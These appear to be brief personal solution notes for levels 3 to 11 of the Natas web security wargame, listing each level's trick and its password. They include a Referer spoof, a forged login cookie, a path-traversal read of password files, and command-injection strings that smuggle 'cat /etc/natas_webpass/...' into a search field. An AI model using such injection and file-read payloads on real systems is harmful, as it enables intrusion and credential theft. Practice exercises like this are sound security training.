- natas3
    - solution: pixel.png is in /files/, so look there for users.txt
    - pw: 
- natas4
    - solution: /robots.txt
    - pw: Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ
- natas5
    - solution: wget --referer
    - pw: iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq
- natas6
    - solution: --header "Cookie: loggedin=1"
    - pw: aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1
- natas7
    - solution: /includes/secret.inc says "FOEIUWGHFEEUHOFUOIU"
    - pw: 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9
- natas8:
    - solution: index.php?page=/etc/natas_webpass/natas8
    - pw: DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe 
- natas9:
    - php -r 'print base64_decode(strrev(hex2bin("3d3d516343746d4d6d6c315669563362")));'
    - secret: oubWYf2kBq
    - pw: W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl
- natas10:
    - solution: "a a; cat /etc/natas_webpass/natas10; echo "
    - pw: nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu
- natas11:
    - solution: "c /etc/natas_webpass/natas11 --exclude "
    - pw: U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK
